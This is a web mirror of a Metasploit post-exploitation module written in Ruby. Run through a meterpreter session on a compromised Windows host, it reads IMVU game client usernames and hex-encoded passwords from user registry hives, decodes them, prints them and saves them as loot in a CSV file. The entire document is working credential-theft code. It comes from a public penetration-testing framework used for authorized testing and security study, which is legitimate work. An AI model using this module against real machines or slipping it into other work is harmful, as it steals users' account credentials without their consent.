CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/post/windows/gather/credentials/imvu.rb
Views: 11704
1
# -*- coding: binary -*-

2


3
##

4
# This module requires Metasploit: https://metasploit.com/download

5
# Current source: https://github.com/rapid7/metasploit-framework

6
##

7


8
class MetasploitModule < Msf::Post

9
  include Msf::Post::Windows::Registry

10
  include Msf::Auxiliary::Report

11
  include Msf::Post::Windows::UserProfiles

12


13
  def initialize(info = {})

14
    super(

15
      update_info(

16
        info,

17
        'Name' => 'Windows Gather Credentials IMVU Game Client',

18
        'Description' => %q{

19
          This module extracts account username & password from the IMVU game client

20
          and stores it as loot.

21
        },

22
        'Author' => [

23
          'Shubham Dawra <shubham2dawra[at]gmail.com>' # www.SecurityXploded.com

24
        ],

25
        'License' => MSF_LICENSE,

26
        'Platform' => [ 'win' ],

27
        'SessionTypes' => [ 'meterpreter' ]

28
      )

29
    )

30
  end

31


32
  def run

33
    creds = Rex::Text::Table.new(

34
      'Header' => 'IMVU Credentials',

35
      'Indent' => 1,

36
      'Columns' => [

37
        'User',

38
        'Password'

39
      ]

40
    )

41


42
    credcount = 0

43
    userhives = load_missing_hives

44
    userhives.each do |hive|

45
      next if hive['HKU'].nil?

46


47
      vprint_status("Looking at Key #{hive['HKU']}")

48
      subkeys = registry_enumkeys("#{hive['HKU']}\\Software\\IMVU\\")

49
      if subkeys.nil? || subkeys.empty?

50
        print_status('IMVU not installed for this user.')

51
        next

52
      end

53
      user = registry_getvaldata("#{hive['HKU']}\\Software\\IMVU\\username\\", '')

54
      hpass = registry_getvaldata("#{hive['HKU']}\\Software\\IMVU\\password\\", '')

55
      decpass = [ hpass.downcase.gsub(/'/, '').gsub(/\\?x([a-f0-9][a-f0-9])/, '\1') ].pack('H*')

56
      print_good("User=#{user}, Password=#{decpass}")

57
      creds << [user, decpass]

58
      credcount = (credcount + 1)

59
    end

60


61
    # clean up after ourselves

62
    unload_our_hives(userhives)

63
    print_status("#{credcount} Credentials were found.")

64


65
    if credcount > 0

66
      print_status('Storing data...')

67
      path = store_loot(

68
        'imvu.user.creds',

69
        'text/csv',

70
        session,

71
        creds.to_csv,

72
        'imvu_user_creds.csv',

73
        'IMVU User Credentials'

74
      )

75
      print_good("IMVU user credentials saved in: #{path}")

76
    end

77
  end

78
end

79


80